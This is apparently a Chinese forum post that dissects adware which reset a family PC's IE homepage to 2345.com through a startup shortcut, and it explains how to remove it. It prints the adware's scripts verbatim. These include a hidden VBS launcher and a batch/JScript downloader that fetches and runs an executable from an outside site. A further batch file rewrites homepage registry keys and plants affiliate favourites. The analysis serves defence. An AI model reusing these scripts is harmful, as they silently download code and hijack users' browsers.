流氓软件导致主页被篡改成2345.com的分析，包括解决方法

如果您没有闲心看完整篇帖子而仅仅是为了寻求解决方法，请直接看最后

    今天老妈用电脑升级个软件，结果带进来个不知什么东西，把我主页给改成了臭名昭著的2345.com，开始没在意：改了就改了吧，我再改回来吧。
    当然，直接把主页改成about:blank肯定是没戏的，不过我也试了一下：万一好使呢？虽然结果不出所料的不好使。
    再看一眼360安全卫士的锁定主页——居然还是空白页！解开锁定再锁定上也没用，这不得不说是360失败的地方……
    不过这样也确定了，那就是流氓插件绑定的问题了。这个时候如果去注册表说不定会好使，不过有了360，那就用360清理插件吧，我也懒得自己去找注册表……【附：注册表关于IE主页的键值：HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main中的StartPage，直接修改成想要的主页就可以】
    清理之后，不出所料有一个差评插件，清理之！之后按照提示重启
    可是重启之后发现：NANI?还是不好使？再次清理之！这次就不要重启了，这时发现：主页已经被改回到正常的空白页了，说明360的清理是有效的，可是为什么重启之后又回来了呢？这个时候就可以确定，这家伙在启动项里做了手脚。Win（就是键盘上那个微软的标志，一按会拉开开始菜单的那个按键）+R，输入msconfig，查看启动项：
    发现他了！一个叫做kqidong.lnk的启动项，目标指向C:\PROGR~1\qidong\qidong.vbs，这里就要解释一下：如果用过DOS（不是那个CMD批处理，就是DOS系统）的童鞋都会知道，当一个文件夹在电脑中的名字太长时，就会显示为“前几个字母+~+数字编号”的形式，这样目标就确定了：C:\Program Files\qidong\qidong.vbs这个时候其实问题就算是解决了，把这个文件夹C:\Program Files\qidong删除肯定就没问题了，可是拥有求知欲的人永远是蛋疼的，我点了进去：
    因为我的电脑设置成了不隐藏系统文件和显示所有文件和文件夹，所以我很轻松的看到了里面所包含的东西：kqidong.zip、qidong.bat、qidong.exe、qidong.vbs、xiazai.bat，其中qidong.exe是winrar 自解压格式，正好我也懒得反编译；我只扫了一眼就确定了：这个东东一定是中国人弄得！（因为用的是汉语拼音……）
先查看那个qidong.vbs，用记事本看看他源码：右键——编辑，发现了里面的内容只有短短三行：

1. 
   
2. set Cleaner=createobject("wscript.shell")
   
3. Cleaner.run "qidong.bat",vbhide
   
4. Cleaner.run "xiazai.bat",vbhide
   
5. 
   

复制代码

    这三行代码的意思仅仅是在隐藏窗体的情况下运行qidong.bat和xiazai.bat两个批处理文件，那再看看这两个的源码吧，先是xiazai.bat，同样右键——编辑：

1. 
   
2. echo=1/*>nul&@cls
   
3. @echo off
   
4. call :http "http://www.jinrong800.com/baiduguangjia/qidong/qidong.exe" "C:\Program Files"\qidong\qidong.exe"
   
5. @echo
   
6. start "" "C:\Program Files"\qidong\qidong.exe
   
7. :http
   
8. echo Source:      "%~1"
   
9. echo Destination: "%~f2"
   
10. echo Start downloading. . .
    
11. cscript -nologo -e:jscript "%~f0" "%~1" "%~2"
    
12. echo OK!
    
13. goto :eof
    
14. */
    
15. var iLocal,iRemote,xPost,sGet;
    
16. iLocal =WScript.Arguments(1); 
    
17. iRemote = WScript.Arguments(0); 
    
18. iLocal=iLocal.toLowerCase();
    
19. iRemote=iRemote.toLowerCase();
    
20. xPost = new ActiveXObject("Microsoft"+String.fromCharCode(0x2e)+"XMLHTTP");
    
21. xPost.Open("GET",iRemote,0);
    
22. xPost.Send();
    
23. sGet = new ActiveXObject("ADODB"+String.fromCharCode(0x2e)+"Stream");
    
24. sGet.Mode = 3;
    
25. sGet.Type = 1; 
    
26. sGet.Open(); 
    
27. sGet.Write(xPost.responseBody);
    
28. sGet.SaveToFile(iLocal,2); 
    
29. 
    

复制代码

    看不懂？没关系！联系那个文件名和几个网址和地址我们就可以断定：这是用来下载那个自解压文件并解压的，那我们去看看那个自解压文件qidong.exe：右键——用Winrar打开，里面仅仅有着一个qidong.bat，在右面提示着

1. 
   
2. ;下面的注释包含自解压脚本命令
   
3. 
   
4. Silent=1
   
5. Overwrite=1
   
6. 
   

复制代码

    这里我解释一下：Silent=1是静默状态下解压，不会弹出窗口，而Overwrite=1是如果有同名文件直接替换，保证了不会弹出：“XXX已经存在，是否覆盖”之类的提示来告诉你他在运行。
    那么接下来看看qidong.bat，同样“右键——编辑”，可这次就不那么顺利了：里面全是乱码，这怎么办呢？还好我有神器：Notepad++，右键——Edit with Notepad++（UE当然也可以做到同样的事情），这次他就无处躲藏了，请看源码：

1. 
   
2. %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a 
   
3. cls
   
4. ::设置主页并锁定
   
5. @REG ADD "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t REG_EXPAND_SZ /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.2345.com/?10688" /f   
   
6. @reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.2345.com/?10688" /f   
   
7. 
   
8. ::添加快捷方式到收藏夹
   
9. @echo off&setlocal enabledelayedexpansion
   
10. REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Favorites >%Temp%\Favorites.txt
    
11. for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%\Favorites.txt') do (
    
12. echo [InternetShortcut] >>%%k\2345网址导航.url&echo URL="http://www.2345.com/?10688" >>%%k\2345网址导航.url&del /f /s /q %Temp%\Favorites.txt>nul
    
13. )
    
14. 
    
15. @echo off&setlocal enabledelayedexpansion
    
16. REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Favorites >%Temp%\Favorites.txt
    
17. for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%\Favorites.txt') do (
    
18. echo [InternetShortcut] >>%%k\0什么电影都能搜索-你懂的.url&echo URL="http://www.ks888.net" >>%%k\0什么电影都能搜索-你懂的.url&del /f /s /q %Temp%\Favorites.txt>nul
    
19. )
    
20. 
    
21. 
    
22. @echo off&setlocal enabledelayedexpansion
    
23. REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Favorites >%Temp%\Favorites.txt
    
24. for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%\Favorites.txt') do (
    
25. echo [InternetShortcut] >>%%k\1淘宝热卖.url&echo URL="http://www.taobao.com/go/chn/tbk_channel/channelcode.php?pid=mm_10836206_0_0&eventid=101329" >>%%k\1淘宝热卖.url&del /f /s /q %Temp%\Favorites.txt>nul
    
26. )
    
27. 
    

复制代码

    居然连注释都有……这流氓软件的作者还真可爱，正好也省去了多费口舌解释，这样通过开机启动项里面运行的qidong.vbs，即使文件被360干掉了他也能保证每次开机都重新缠上你，果然是“臭牛氓”！
    而那个kqidong.zip中装的就是kqidong.lnk则是最开始启动项里面的那个，直接指向C:\Program Files\qidong\qidong.vbs
    至此我们已经完整的掌握了这个万恶的2345.com的流氓团伙的信息，可以直接干掉他了！
    通过随便一个清理插件的工具清理掉插件、之后打开msconfig，ban掉kqidong.lnk这个启动项，再把C盘Program Files下的qidong文件夹删除，这个臭牛氓就被彻底的请出电脑了！不过记得最后一步：把主页改回来，最好去上面给出了注册表项里面查看一下Startpage，是不是已经改过来了，如果没改过来就处理一下吧。